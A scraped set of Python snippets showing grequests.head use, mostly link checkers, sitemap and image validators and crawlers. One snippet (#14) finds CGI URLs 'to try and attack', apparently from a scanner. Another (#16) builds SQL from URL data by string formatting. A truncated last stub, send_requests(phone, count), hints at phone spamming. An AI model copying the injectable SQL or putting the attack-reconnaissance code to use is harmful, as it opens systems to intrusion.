Example #1
0
    def run(self):

        total = 0
        totals = {}
        bad_results = 0

        with open(self.hjson_path) as f:
            sites = json.load(f)

        rs = (grequests.head(s.get('url'),
                             hooks={'response': [self.hook_factory(s)]})
              for s in sites.get('base_urls'))
        for r in grequests.imap(rs, size=20):
            total += 1
            if totals.get(r.status_code):
                totals[r.status_code] += 1
            else:
                totals[r.status_code] = 1
            if r.status_code >= 400:
                bad_results += 1

        print('========================================================')
        print('Summary')
        print('========================================================')
        print('Total requests: %d' % total)
        print('Bad responses: %d' % bad_results)
        for sc in totals:
            print('Status Code %d: %d' % (sc, totals[sc]))

        self.dispatcher.command_complete.emit(0)
Example #2
0
def make_grequest(urls, content=False, size=5):
    """
        Return the dict of (url,status_code, content_type Or content) of each list of url
        in urls
    """
    try:
        reqs = set()
        ret = dict()
        if content:
            reqs = (grequests.get(url) for url in urls)
        else:
            reqs = (grequests.head(url) for url in urls)

        res = grequests.map(reqs, stream=False, size=size)
        for url, r in zip(urls, res):
            log.info('Made Request %s :: %d ' % (url, r.status_code))
            if content:
                ret[url] = {'status_code': r.status_code, 'content': r.text}
            else:
                ret[url] = {'status_code': r.status_code}
        if ret:
            return ret

        raise Exception
    except Exception as e:
        log.exception('Error in make_grequest')
Example #3
0
    def cdn_images(urls):
        rs = []
        for (k, v) in urls.items():
            hostname = urlparse(k).hostname
            path = urlparse(k).path
            query = urlparse(k).query

            key = ''.join([
                str(hashlib.md5(hostname).hexdigest())[:8], '/',
                hashlib.md5(k).hexdigest()
            ])
            urls[k] = ''.join(['http://p.cdn.sohu.com/', key])

            url = ''.join(['http://bjcnc.scs-in.sohucs.com/storage', path])
            if query:
                url = ''.join([url, '?', query])

            rs.append(
                grequests.head(url,
                               headers={
                                   'x-scs-meta-mirror-host': hostname,
                                   'x-scs-meta-upload-key': key
                               }))
        grequests.map(rs)

        return urls
Example #4
0
    def scan(self, session):
        time_started = time.strftime('%Y-%m-%d %H:%M:%S')
        author = getpass.getuser()
        http, https = self.supported.keys()[0], self.supported.keys()[1]
        url_factory = self.url_factory()
        urls = url_factory(http, session) + url_factory(https, session)

        self.session = session

        async_requests = [
            grequests.head(
                url=url,
                allow_redirects=False,
                headers={
                    'User-Agent': settings.USER_AGENT, 'Host': host},
                hooks=dict(response=self.success_hook),
                timeout=settings.TIMEOUT) for host, url in urls]

        grequests.map(
            requests=async_requests,
            size=settings.CONCURRENT_REQUESTS,
            exception_handler=self.failure_hook)

        time_ended = time.strftime('%Y-%m-%d %H:%M:%S')
        scan_instance = ScanInstance(
            start_time=time_started,
            end_time=time_ended,
            author=author)

        self.session.add(scan_instance)
        export_xlsx(session)
def make_grequest(urls, content=False, size=5):
    """
        Return the dict of (url,status_code, content_type Or content) of each list of url
        in urls
    """
    try:
        reqs = set()
        ret = dict()
        if content:
            reqs = (grequests.get(url) for url in urls)
        else:
            reqs = (grequests.head(url) for url in urls)

        res = grequests.map(reqs, stream=False, size=size)
        for url, r in zip(urls, res):
            log.info('Made Request %s :: %d ' % (url, r.status_code))
            if content:
                ret[url] = {
                    'status_code': r.status_code,
                    'content': r.text
                }
            else:
                ret[url] = {
                    'status_code': r.status_code
                }
        if ret:
            return ret

        raise Exception
    except Exception as e:
        log.exception('Error in make_grequest')
Example #6
0
def wake_sites():
    rs = []
    for user in User.query.filter(User.roles.any(Role.name == 'user'),
                                  User.roles.any(Role.name == 'decal')):
        if user.website:
            rs.append(grequests.head(user.website))
            print colored('Waking %s' % user.website, 'yellow')
    grequests.map(rs)
    print colored("%d sites awoken!" % len(rs), 'green')
def check_transparency_portal_existance(dataset, portal_urls):
    dataset['transparency_portal_url'] = 'None'
    dataset['status_code'] = 0

    for url in portal_urls:
        dataset['transparency_portal_url'] = dataset.apply(format_url, axis=1, args=(url,))
        rs = (grequests.head(u) for u \
              in list(dataset.loc[dataset['status_code'] == 0, 'transparency_portal_url']))

        responses = grequests.map(rs, exception_handler=exception_handler)
        responses = [get_status_code(r) for r in responses]

        dataset.loc[dataset['status_code'] == 0, 'status_code'] = responses
        dataset.loc[dataset['status_code'] == 0, 'transparency_portal_url'] = 'None'
def test_fetch_cards_sending_requests_by_batches_not_blocking_for_responses():
    """
    Send requests but don't block for the response.
    Use a request pool to keep a threshold of maximum number of requests.
    Use a callback to get notified of the response.
    """
    urls = [mtgurl.make_vanilla_url(cardname) for cardname in CARDS]
    reqs = (grequests.head(url, allow_redirects=True, callback=_on_response)
            for url in urls)
    pool = grequests.Pool(30)
    for req in reqs:
        grequests.send(req, pool)

    # Don't exit until we received the responses, otherwise we may lose some of them
    import time
    time.sleep(20)
Example #9
0
 def _check_urls(self):
     """
     Concurrently checking bunch of URLs, limited by SITEMAP_CHECK_LIMIT setting,
     displaying progress in console.
     """
     
     total = len(self.urls)
     for i in range(0, len(self.urls), settings.SITEMAP_CHECK_LIMIT):
         r = (grequests.head(u) for u in self.urls[i:i+settings.SITEMAP_CHECK_LIMIT])
         rs = grequests.map(r)
         self.error_urls += filter(lambda x: x.status_code not in [200, 301, 302], rs)
         self.checked_urls += len(self.urls[i:i+settings.SITEMAP_CHECK_LIMIT])
         remained = total - self.checked_urls
         progress = round(self.checked_urls / total, 2)
         sys.stdout.write('\rChecked %.2f%% (%s URLs, %d errors, %d remained)' % (progress, self.checked_urls, 
                                                                          len(self.error_urls), remained))
         sys.stdout.flush()
def check_transparency_portal_existance(dataset, portal_urls):
    dataset['transparency_portal_url'] = 'None'
    dataset['status_code'] = 0

    for url in portal_urls:
        dataset['transparency_portal_url'] = dataset.apply(format_url,
                                                           axis=1,
                                                           args=(url, ))
        rs = (grequests.head(u) for u \
              in list(dataset.loc[dataset['status_code'] == 0, 'transparency_portal_url']))

        responses = grequests.map(rs, exception_handler=exception_handler)
        responses = [get_status_code(r) for r in responses]

        dataset.loc[dataset['status_code'] == 0, 'status_code'] = responses
        dataset.loc[dataset['status_code'] == 0,
                    'transparency_portal_url'] = 'None'
Example #11
0
def fetch_by_url_async(urls):
    reqs = (grequests.head(url, allow_redirects=True) for url in urls)
    responses = grequests.map(reqs,
                              size=10,
                              exception_handler=_exception_handler)
    cardset_found = {}

    for response in responses:
        card_found = True
        try:
            _check_found(response)
        except NotFound:
            card_found = False
        finally:
            cardset_found[response.url] = card_found

    return cardset_found
Example #12
0
    def run(self, fn_on_response, *args, **kwargs):
        logger.info('executor start')
        start_time = time.time()
        no_more_task, urls = self.get_next_task(self.max_workers)
        while True:
            if len(urls):
                break

            tmp_urls = []
            urls = (grequests.head(u, timeout=self.timeout) for u in urls)
            for r in grequests.imap(urls):
                fn_on_response(r)
                no_more_task, urls = self.get_next_task(self.max_workers)
                if len(urls):
                    break

        end_time = time.time()
        logger.info('executor done, %.3fs' % (end_time - start_time))
def main():
    today = datetime.date.today()
    with open('top-1m_{0}.csv'
         .format(today), 'r') as csvfile:
	
        raw = csv.reader(csvfile)
	alexa = [(rank, 'http://' + host) for rank, host in raw]
	alexa_chunks = []
	for x in range(0, len(alexa), 10):
   	    req = [grequests.head(u[1], timeout=1, allow_redirects=False) for u in alexa[x:x+10]]
            rsp = grequests.map(req)
	    durations = []
	    for a in rsp:
		try:
		    durations.append((a.url, a.elapsed))
		except:
		    pass
			
	    print durations
Example #14
0
 def check_urls(host, port, is_https=False, url_list=CGI_FILES):
     """
     Checks if which urls exist
     :return: Sequence of URLs to try and attack
     """
     import grequests
     attack_path = 'http://'
     if is_https:
         attack_path = 'https://'
     attack_path = attack_path + str(host) + ":" + str(port)
     attack_urls = [attack_path + url for url in url_list]
     reqs = (grequests.head(u, verify=False, timeout=TIMEOUT)
             for u in attack_urls)
     resps = grequests.map(reqs, size=15)
     valid_resps = [
         resp for resp in resps
         if resp and resp.status_code == requests.codes.ok
     ]
     urls = [resp.url for resp in valid_resps]
     return urls
Example #15
0
    def _check_urls(self):
        """
        Concurrently checking bunch of URLs, limited by SITEMAP_CHECK_LIMIT setting,
        displaying progress in console.
        """

        total = len(self.urls)
        for i in range(0, len(self.urls), settings.SITEMAP_CHECK_LIMIT):
            r = (grequests.head(u)
                 for u in self.urls[i:i + settings.SITEMAP_CHECK_LIMIT])
            rs = grequests.map(r)
            self.error_urls += filter(
                lambda x: x.status_code not in [200, 301, 302], rs)
            self.checked_urls += len(self.urls[i:i +
                                               settings.SITEMAP_CHECK_LIMIT])
            remained = total - self.checked_urls
            progress = round(self.checked_urls / total, 2)
            sys.stdout.write(
                '\rChecked %.2f%% (%s URLs, %d errors, %d remained)' %
                (progress, self.checked_urls, len(self.error_urls), remained))
            sys.stdout.flush()
Example #16
0
def convert_url(filtered):
    """ Next step is getting a jobs listings url, we do this by checking the header of 'careerjet.co.th' link """

    job = (grequests.head(u, allow_redirects=False, verify=False, timeout=5) for x, u in filtered)
    try:
        mp = grequests.map(job)
    except requests.ConnectionError as e:
        print e
    except BaseException as e:
        print e
    converted_list = []
    db = conn()
    cursor = db.cursor()
    for url in mp:
        converted_list.append([url.headers['location']])
        cursor.execute(
            "UPDATE job_url SET converted_url='{url}' WHERE url='{original_url}'".format(url=url.headers['location'],
                                                                                         original_url=url.url))
        db.commit()
        print 'data was updated :', url.headers['location']
    db.close()
def check_urls_in_rfm_resolve_correctly(records):
    """
    Do HEAD requests on all files in remote file manifests to test that the
    links we build point to real files.
    :return:
    """
    rfms = [r[1] for r in records]

    urls, file_lengths = [], []
    for rfm in rfms:
        for record in rfm:
            urls.append(record['url'])
            file_lengths.append(record['length'])

    rs = (grequests.head(u) for u in urls)
    map = grequests.map(rs)

    failures = [
        url for request, url in zip(map, urls) if request.status_code != 200
    ]

    if not failures:
        print('SUCCESS: All "URL"s in the remote file manifests '
              'resolved to files on s3! ({} files checked)'.format(len(urls)))
    else:
        print('FAIL: The following URLs did not resolve: \n{}'.format(
            '\n'.join(failures)))

    responses = [(url, length, request.headers['Content-Length'])
                 for request, url, length in zip(map, urls, file_lengths)
                 if int(request.headers['Content-Length']) != int(length)]
    infos = [('RFM Length: {}, Expected: {}, URL: {}'
              ''.format(length, expected, url))
             for url, length, expected in responses]

    if not responses:
        print('SUCCESS: All sizes match the rfms!')
    else:
        print('FAIL: The following URLs have mismatching size: \n{}'
              ''.format('\n'.join(infos)))
Example #18
0
def startTaskParallal(dataLIst):
    concurrent_limit = 100
    hdrs = {'connection': 'keep-alive'}
    urls = []
    tmp_data = {}
    for row in dataLIst:
        id, d, firstLabel, secondLabel, title, link, isExternal = row

        isExternal = int(isExternal)
        url = link
        if not isExternal:
            url = d + link

        urls.append([id, url, isExternal])
        tmp_data[id] = row

    rs = (grequests.head(
        u[1], allow_redirects=False, params={'uniqueid': u[0]}) if u[2] else
          grequests.get(u[1], allow_redirects=False, params={'uniqueid': u[0]})
          for u in urls)
    #res = grequests.map(rs)
    for res in grequests.imap(rs, size=concurrent_limit):

        if res is not None:
            url = res.url
            #print(url)
            params = parse_qs(urlparse(url).query)

            if 'uniqueid' in params:
                key = int(params['uniqueid'][0])

                id, d, firstLabel, secondLabel, title, link, isExternal = tmp_data[
                    key]

                data.append(
                    (d, firstLabel, secondLabel, title, link, res.status_code,
                     len(res.content), isExternal))
                ids.append(id)
                print(len(ids))
def test_fetch_cards_sending_requests_by_batches_blocking_for_responses():
    """
    Send requests blocking for the response.
    Use a request pool to keep a threshold of maximum number of requests.
    Block until all responses are received.
    """
    import time
    start = time.time()
    urls = [mtgurl.make_vanilla_url(cardname) for cardname in CARDS]
    reqs = (grequests.head(url, allow_redirects=True) for url in urls)
    responses = grequests.imap(reqs, size=30)

    delay = 1
    time.sleep(delay)

    index = 0
    for response in responses:
        print(response.url)
        assert response
        assert response.status_code in [200]
        index += 1

    stop = time.time()
    print(stop - start - delay)
def validate_images(results, image_urls):
    """
    Make sure images exist before we display them. Treat redirects as broken
    links since 99% of the time the redirect leads to a generic "not found"
    placeholder.

    Results are cached in redis and shared amongst all API servers in the
    cluster.
    """
    if not image_urls:
        return
    start_time = time.time()
    # Pull matching images from the cache.
    redis = get_redis_connection("default")
    cache_prefix = 'valid:'
    cached_statuses = redis.mget([cache_prefix + url for url in image_urls])
    cached_statuses = [
        int(b.decode('utf-8')) if b is not None else None
        for b in cached_statuses
    ]
    # Anything that isn't in the cache needs to be validated via HEAD request.
    to_verify = {}
    for idx, url in enumerate(image_urls):
        if cached_statuses[idx] is None:
            to_verify[url] = idx
    reqs = (grequests.head(u, allow_redirects=False, timeout=0.2, verify=False)
            for u in to_verify.keys())
    verified = grequests.map(reqs, exception_handler=_validation_failure)
    # Cache newly verified image statuses.
    to_cache = {}
    for idx, url in enumerate(to_verify.keys()):
        cache_key = cache_prefix + url
        if verified[idx]:
            status = verified[idx].status_code
        # Response didn't arrive in time. Try again later.
        else:
            status = -1
        to_cache[cache_key] = status

    thirty_minutes = 60 * 30
    twenty_four_hours_seconds = 60 * 60 * 24
    pipe = redis.pipeline()
    if len(to_cache) > 0:
        pipe.mset(to_cache)
    for key, status in to_cache.items():
        # Cache successful links for a day, and broken links for 120 days.
        if status == 200:
            pipe.expire(key, twenty_four_hours_seconds)
        elif status == -1:
            # Content provider failed to respond; try again in a short interval
            pipe.expire(key, thirty_minutes)
        else:
            pipe.expire(key, twenty_four_hours_seconds * 120)
    pipe.execute()

    # Merge newly verified results with cached statuses
    for idx, url in enumerate(to_verify):
        cache_idx = to_verify[url]
        if verified[idx] is not None:
            cached_statuses[cache_idx] = verified[idx].status_code
        else:
            cached_statuses[cache_idx] = -1

    # Delete broken images from the search results response.
    for idx, _ in enumerate(cached_statuses):
        del_idx = len(cached_statuses) - idx - 1
        status = cached_statuses[del_idx]
        if status == 429 or status == 403:
            log.warning(
                'Image validation failed due to rate limiting or blocking. '
                'Affected URL: {}'.format(image_urls[idx]))
        elif status != 200:
            log.info('Deleting broken image with ID {} from results.'.format(
                results[del_idx]['identifier']))
            del results[del_idx]
    end_time = time.time()
    log.info('Validated images in {} '.format(end_time - start_time))
def validate_images(query_hash, start_slice, results, image_urls):
    """
    Make sure images exist before we display them. Treat redirects as broken
    links since 99% of the time the redirect leads to a generic "not found"
    placeholder.

    Results are cached in redis and shared amongst all API servers in the
    cluster.
    """
    logger = parent_logger.getChild("validate_images")
    if not image_urls:
        logger.info("no image urls to validate")
        return

    logger.debug("starting validation")
    start_time = time.time()
    # Pull matching images from the cache.
    redis = django_redis.get_redis_connection("default")
    cache_prefix = "valid:"
    cached_statuses = redis.mget([cache_prefix + url for url in image_urls])
    cached_statuses = [
        int(b.decode("utf-8")) if b is not None else None
        for b in cached_statuses
    ]
    logger.debug(f"len(cached_statuses)={len(cached_statuses)}")
    # Anything that isn't in the cache needs to be validated via HEAD request.
    to_verify = {}
    for idx, url in enumerate(image_urls):
        if cached_statuses[idx] is None:
            to_verify[url] = idx
    logger.debug(f"len(to_verify)={len(to_verify)}")
    reqs = (grequests.head(u, allow_redirects=False, timeout=2, verify=False)
            for u in to_verify.keys())
    verified = grequests.map(reqs, exception_handler=_validation_failure)
    # Cache newly verified image statuses.
    to_cache = {}
    for idx, url in enumerate(to_verify.keys()):
        cache_key = cache_prefix + url
        if verified[idx]:
            status = verified[idx].status_code
        # Response didn't arrive in time. Try again later.
        else:
            status = -1
        to_cache[cache_key] = status

    thirty_minutes = 60 * 30
    twenty_four_hours_seconds = 60 * 60 * 24
    pipe = redis.pipeline()
    if len(to_cache) > 0:
        pipe.mset(to_cache)
    for key, status in to_cache.items():
        # Cache successful links for a day, and broken links for 120 days.
        if status == 200:
            logger.debug("healthy link " f"key={key} ")
            pipe.expire(key, twenty_four_hours_seconds)
        elif status == -1:
            logger.debug("no response from provider " f"key={key}")
            # Content provider failed to respond; try again in a short interval
            pipe.expire(key, thirty_minutes)
        else:
            logger.debug("broken link " f"key={key} ")
            pipe.expire(key, twenty_four_hours_seconds * 120)
    pipe.execute()

    # Merge newly verified results with cached statuses
    for idx, url in enumerate(to_verify):
        cache_idx = to_verify[url]
        if verified[idx] is not None:
            cached_statuses[cache_idx] = verified[idx].status_code
        else:
            cached_statuses[cache_idx] = -1

    # Create a new dead link mask
    new_mask = [1] * len(results)
    # Delete broken images from the search results response.
    for idx, _ in enumerate(cached_statuses):
        del_idx = len(cached_statuses) - idx - 1
        status = cached_statuses[del_idx]
        if status == 429 or status == 403:
            logger.warning(
                "Image validation failed due to rate limiting or blocking. "
                f"url={image_urls[idx]} "
                f"status={status} ")
        elif status != 200:
            logger.info("Deleting broken image from results "
                        f"id={results[del_idx]['identifier']} "
                        f"status={status} ")
            del results[del_idx]
            new_mask[del_idx] = 0

    # Merge and cache the new mask
    mask = get_query_mask(query_hash)
    if mask:
        new_mask = mask[:start_slice] + new_mask
    save_query_mask(query_hash, new_mask)

    end_time = time.time()
    logger.debug("end validation "
                 f"end_time={end_time} "
                 f"start_time={start_time} "
                 f"delta={end_time - start_time} ")
Example #22
0
def main():
    parse_argument(sys.argv[1:])

    if LOCAL:
        all_links = get_local_license()
    else:
        all_links = get_global_license()

    GITHUB_BASE = ("https://raw.githubusercontent.com/creativecommons"
                   "/creativecommons.org/master/docroot/legalcode/")

    errors_total = 0
    for license in all_links:
        try:
            license_name = license.string
        except AttributeError:
            license_name = license
        caught_errors = 0
        page_url = "{}{}".format(GITHUB_BASE, license_name)
        print("\n")
        print("Checking:", license_name)
        # Refer to issue for more info on samplingplus_1.0.br.htm:
        #   https://github.com/creativecommons/cc-link-checker/issues/9
        if license_name == "samplingplus_1.0.br.html":
            continue
        filename = license_name[:-len(".html")]
        base_url = create_base_link(filename)
        print("URL:", base_url)
        if LOCAL:
            source_html = request_local_text(license_name)
        else:
            source_html = request_text(page_url)
        license_soup = BeautifulSoup(source_html, "lxml")
        links_in_license = license_soup.find_all("a")
        verbose_print("Number of links found:", len(links_in_license))
        verbose_print("Errors and Warnings:")
        valid_anchors, valid_links = get_scrapable_links(
            base_url, links_in_license)
        if valid_links:
            memoized_results = get_memoized_result(valid_links, valid_anchors)
            stored_links = memoized_results[0]
            stored_anchors = memoized_results[1]
            stored_result = memoized_results[2]
            check_links = memoized_results[3]
            check_anchors = memoized_results[4]
            if check_links:
                rs = (
                    # Since we're only checking for validity, we can retreive
                    # only the headers/metadata
                    grequests.head(link, timeout=REQUESTS_TIMEOUT)
                    for link in check_links)
                responses = list()
                # Explicitly close connections to free up file handles and
                # avoid Connection Errors per:
                # https://stackoverflow.com/questions/21978115/using-grequests-to-make-several-thousand-get-requests-to-sourceforge-get-max-r/22839550#22839550
                for response in grequests.map(
                        rs, exception_handler=exception_handler):
                    try:
                        responses.append(response.status_code)
                        response.close()
                    except AttributeError:
                        responses.append(response)
                memoize_result(check_links, responses)
                stored_anchors += check_anchors
                stored_result += responses
            stored_links += check_links
            caught_errors = write_response(
                stored_links,
                stored_result,
                base_url,
                license_name,
                stored_anchors,
            )

        if caught_errors:
            errors_total += caught_errors
            ERR_CODE = 1

    print("\nCompleted in: {}".format(time.time() - START_TIME))

    if OUTPUT_ERR:
        output_summary(all_links, errors_total)
        print("\nError file present at: ", OUTPUT.name)
        output_test_summary(errors_total)

    sys.exit(ERR_CODE)
Example #23
0
def main():
    # get argument
    parser = OptionParser(
        usage='Usage: %prog [<CDN_URL>]'
        '\n\nArguments:'
        '\n  CDN_URL    Of the format "<scheme>://<fqdn>".'
        ' Trailing "/" not allowed.'
        '\n\nExamples:'
        '\n  %prog https://tiles.cdn.mozilla.net'
    )
    parser.set_defaults(
        quiet=False,
        verbose=False,
    )
    parser.add_option(
        '-q', '--quiet',
        action='store_true',
        dest='quiet',
        help="Don't report NOTICE",
    )
    parser.add_option(
        '-v', '--verbose',
        action='store_true',
        dest='verbose',
        help='Report SUCCESS',
    )
    options, args = parser.parse_args()

    try:
        from splice.environment import Environment
        config = Environment.instance().config
        cdn = 'https://%s.s3.amazonaws.com' % config.S3['bucket']
        tile_index_key = config.S3['tile_index_key']
    except Exception:
        cdn = 'https://tiles.cdn.mozilla.net'
        tile_index_key = 'tile_index_v3.json'

    channels = [
        'desktop',
        'android',
        'desktop-prerelease',
        'hello'
    ]

    if len(args) == 1:
        cdn = args.pop()
    elif len(args) > 1:
        parser.parse_args(['-h'])

    if not options.quiet:
        print(
            'NOTICE: crawling: %s/%s_%s' %
            (cdn, tuple(channels), tile_index_key)
        )
        print('NOTICE: calculating tiles urls')

    errors = []

    # extract tiles urls from tile index
    try:
        urls = [
            tiles_url
            for index in validate(
                grequests.imap(
                    (grequests.get('%s/%s_%s' % (cdn, channel, tile_index_key), allow_redirects=False,)
                     for channel in channels),
                    size=10
                ),
                options.verbose,
                errors,
            )
            for key, value in index.json().iteritems()
            if '/' in key
            for tiles_url in value.values()
        ]

        tiles_urls = set()
        for url in urls:
            if type(url) is list:
                tiles_urls.update(url)
            else:
                tiles_urls.add(url)

        if not options.quiet:
            print('NOTICE: tiles urls extracted: %s' % len(tiles_urls))
            print('NOTICE: calculating image urls')

        # extract image urls from tiles
        image_urls = set([
            image_url
            for tiles in validate(
                grequests.imap(
                    (grequests.get(tiles_url, allow_redirects=False)
                     for tiles_url in tiles_urls),
                    size=10
                ),
                options.verbose,
                errors,
            )
            for value_x in tiles.json().values()
            for value_y in value_x
            for key, image_url in value_y.iteritems()
            if key in ['imageURI', 'enhancedImageURI']
        ])

        if not options.quiet:
            print('NOTICE: image urls extracted: %s' % len(image_urls))
            print('NOTICE: validating image urls')

        # Two things to notice here:
        # 1. expanding the list comprehension is necessary to get the 'validate'
        #    step above to actually evaluate (it's lazy.)
        # 2. the actual value of the list comprehension is dropped, not returned.
        [
            valid.url
            for valid in validate(
                grequests.imap(
                    (grequests.head(image_url, allow_redirects=False)
                     for image_url in image_urls),
                    size=10
                ),
                options.verbose,
                errors,
            )
        ]
    except Exception as e:
        msg = 'ERROR: %s' % e
        print(msg)
        print(traceback.format_exc())
        errors.append(msg)

    if errors:
        exit(1)
Example #24
0
def main():
    args = parse_argument(sys.argv[1:])

    if args.local:
        license_names = get_local_licenses()
    else:
        license_names = get_github_licenses()
    if args.log_level <= INFO:
        print("Number of files to be checked:", len(license_names))
    errors_total = 0
    exit_status = 0
    for license_name in license_names:
        caught_errors = 0
        context_printed = False
        filename = license_name[:-len(".html")]
        base_url = create_base_link(args, filename)
        context = f"\n\nChecking: {license_name}\nURL: {base_url}"
        if args.local:
            source_html = request_local_text(license_name)
        else:
            page_url = "{}{}".format(GITHUB_BASE, license_name)
            source_html = request_text(page_url)
        license_soup = BeautifulSoup(source_html, "lxml")
        links_in_license = license_soup.find_all("a")
        link_count = len(links_in_license)
        if args.log_level <= INFO:
            print(f"{context}\nNumber of links found: {link_count}")
            context_printed = True
        valid_anchors, valid_links, context_printed = get_scrapable_links(
            args, base_url, links_in_license, context, context_printed)
        if valid_links:
            memoized_results = get_memoized_result(valid_links, valid_anchors)
            stored_links = memoized_results[0]
            stored_anchors = memoized_results[1]
            stored_result = memoized_results[2]
            check_links = memoized_results[3]
            check_anchors = memoized_results[4]
            if check_links:
                rs = (
                    # Since we're only checking for validity, we can retreive
                    # only the headers/metadata
                    grequests.head(link, timeout=REQUESTS_TIMEOUT)
                    for link in check_links)
                responses = list()
                # Explicitly close connections to free up file handles and
                # avoid Connection Errors per:
                # https://stackoverflow.com/a/22839550
                for response in grequests.map(
                        rs, exception_handler=exception_handler):
                    try:
                        responses.append(response.status_code)
                        response.close()
                    except AttributeError:
                        responses.append(response)
                memoize_result(check_links, responses)
                stored_anchors += check_anchors
                stored_result += responses
            stored_links += check_links
            caught_errors = write_response(
                args,
                stored_links,
                stored_result,
                base_url,
                license_name,
                stored_anchors,
                context,
                context_printed,
            )

        if caught_errors:
            errors_total += caught_errors
            exit_status = 1

    print("\nCompleted in: {}".format(time.time() - START_TIME))

    if args.output_errors:
        output_summary(args, license_names, errors_total)
        print("\nError file present at: ", args.output_errors.name)
        output_test_summary(errors_total)

    sys.exit(exit_status)
Example #25
0
def check_legalcode(args):
    print("\n\nChecking LegalCode License...\n\n")
    license_names = get_legalcode(args)
    if args.log_level <= INFO:
        print("Number of files to be checked:", len(license_names))
    errors_total = 0
    exit_status = 0
    for license_name in license_names:
        caught_errors = 0
        context_printed = False
        filename = license_name[:-len(".html")]
        base_url = create_base_link(args, filename)
        context = f"\n\nChecking: legalcode\nURL: {base_url}"
        if args.local:
            source_html = request_local_text(LICENSE_LOCAL_PATH, license_name)
        else:
            page_url = "{}{}".format(LICENSE_GITHUB_BASE, license_name)
            source_html = request_text(page_url)
        license_soup = BeautifulSoup(source_html, "lxml")
        links_found = license_soup.find_all("a")
        link_count = len(links_found)
        if args.log_level <= INFO:
            print(f"{context}\nNumber of links found: {link_count}")
            context_printed = True
        valid_anchors, valid_links, context_printed = get_scrapable_links(
            args, base_url, links_found, context, context_printed)
        if valid_links:
            memoized_results = get_memoized_result(valid_links, valid_anchors)
            stored_links = memoized_results[0]
            stored_anchors = memoized_results[1]
            stored_result = memoized_results[2]
            check_links = memoized_results[3]
            check_anchors = memoized_results[4]
            if check_links:
                rs = (
                    # Since we're only checking for validity, we can retreive
                    # only the headers/metadata
                    grequests.head(link, timeout=REQUESTS_TIMEOUT)
                    for link in check_links)
                responses = list()
                # Explicitly close connections to free up file handles and
                # avoid Connection Errors per:
                # https://stackoverflow.com/a/22839550
                for response in grequests.map(
                        rs, exception_handler=exception_handler):
                    try:
                        responses.append(response.status_code)
                        response.close()
                    except AttributeError:
                        responses.append(response)
                memoize_result(check_links, responses)
                stored_anchors += check_anchors
                stored_result += responses
            stored_links += check_links
            caught_errors = write_response(
                args,
                stored_links,
                stored_result,
                base_url,
                license_name,
                stored_anchors,
                context,
                context_printed,
            )

        if caught_errors:
            errors_total += caught_errors
            exit_status = 1

    return license_names, errors_total, exit_status
Example #26
0
def check_rdfs(args, index=False):
    if index:
        print("\n\nChecking index.rdf...\n\n")
        rdf_obj_list = get_index_rdf(args)
    else:
        print("\n\nChecking RDFs...\n\n")
        rdf_obj_list = get_rdf(args)
    if args.log_level <= INFO:
        if not index:
            print("Number of RDF files to be checked:", len(rdf_obj_list))
        else:
            print(
                "Number of RDF objects/sections to be checked in index.rdf:",
                len(rdf_obj_list),
            )
    errors_total = 0
    exit_status = 0
    for rdf_obj in rdf_obj_list:
        caught_errors = 0
        context_printed = False
        rdf_url = (rdf_obj["rdf:about"]
                   if index else f"{rdf_obj['rdf:about']}rdf")
        links_found = get_links_from_rdf(rdf_obj)
        checking = "URL" if not index else "RDF_ABOUT"
        context = f"\n\nChecking: \n{checking}: {rdf_url}"
        link_count = len(links_found)
        if args.log_level <= INFO:
            print(f"{context}\nNumber of links found: {link_count}")
            context_printed = True
        base_url = rdf_url
        valid_anchors, valid_links, context_printed = get_scrapable_links(
            args,
            base_url,
            links_found,
            context,
            context_printed,
            rdf=True,
        )
        if valid_links:
            memoized_results = get_memoized_result(valid_links, valid_anchors)
            stored_links = memoized_results[0]
            stored_anchors = memoized_results[1]
            stored_result = memoized_results[2]
            check_links = memoized_results[3]
            check_anchors = memoized_results[4]
            if check_links:
                rs = (
                    # Since we're only checking for validity,
                    # we can retreive
                    # only the headers/metadata
                    grequests.head(link, timeout=REQUESTS_TIMEOUT)
                    for link in check_links)
                responses = list()
                # Explicitly close connections to free up file handles and
                # avoid Connection Errors per:
                # https://stackoverflow.com/a/22839550
                for response in grequests.map(
                        rs, exception_handler=exception_handler):
                    try:
                        responses.append(response.status_code)
                        response.close()
                    except AttributeError:
                        responses.append(response)
                memoize_result(check_links, responses)
                stored_anchors += check_anchors
                stored_result += responses
            stored_links += check_links
            caught_errors = write_response(
                args,
                stored_links,
                stored_result,
                rdf_url,
                rdf_obj,
                stored_anchors,
                context,
                context_printed,
            )

        if caught_errors:
            errors_total += caught_errors
            exit_status = 1

    return rdf_obj_list, errors_total, exit_status
Example #27
0
def check_deeds(args):
    print("\n\nChecking Deeds...\n\n")
    license_names = get_legalcode(args)
    if args.log_level <= INFO:
        print("Number of files to be checked:", len(license_names))
    errors_total = 0
    exit_status = 0
    for license_name in license_names:
        caught_errors = 0
        context_printed = False
        filename = license_name[:-len(".html")]
        deed_base_url = create_base_link(args, filename, for_deeds=True)
        # Deeds template:
        # https://github.com/creativecommons/cc.engine/blob/master/cc/engine/templates/licenses/standard_deed.html

        # Scrapping the html found on the active site
        if deed_base_url:
            context = f"\n\nChecking: deed\nURL: {deed_base_url}"
            page_url = deed_base_url
            source_html = request_text(page_url)
            license_soup = BeautifulSoup(source_html, "lxml")
            links_found = license_soup.find_all("a")
            link_count = len(links_found)
            if args.log_level <= INFO:
                print(f"{context}\nNumber of links found: {link_count}")
                context_printed = True
            base_url = deed_base_url
            valid_anchors, valid_links, context_printed = get_scrapable_links(
                args, base_url, links_found, context, context_printed)
            if valid_links:
                memoized_results = get_memoized_result(valid_links,
                                                       valid_anchors)
                stored_links = memoized_results[0]
                stored_anchors = memoized_results[1]
                stored_result = memoized_results[2]

                check_links = memoized_results[3]
                check_anchors = memoized_results[4]
                if check_links:
                    rs = (
                        # Since we're only checking for validity,
                        # we can retreive
                        # only the headers/metadata
                        grequests.head(link, timeout=REQUESTS_TIMEOUT)
                        for link in check_links)
                    responses = list()
                    # Explicitly close connections to free up file handles and
                    # avoid Connection Errors per:
                    # https://stackoverflow.com/a/22839550
                    for response in grequests.map(
                            rs, exception_handler=exception_handler):
                        try:
                            responses.append(response.status_code)
                            response.close()
                        except AttributeError:
                            responses.append(response)
                    memoize_result(check_links, responses)
                    stored_anchors += check_anchors
                    stored_result += responses
                stored_links += check_links
                caught_errors = write_response(
                    args,
                    stored_links,
                    stored_result,
                    base_url,
                    license_name,
                    stored_anchors,
                    context,
                    context_printed,
                )

            if caught_errors:
                errors_total += caught_errors
                exit_status = 1

    return license_names, errors_total, exit_status
Example #28
0
def send_requests(phone: str, count: int):

    password = GenerateInfo().password()

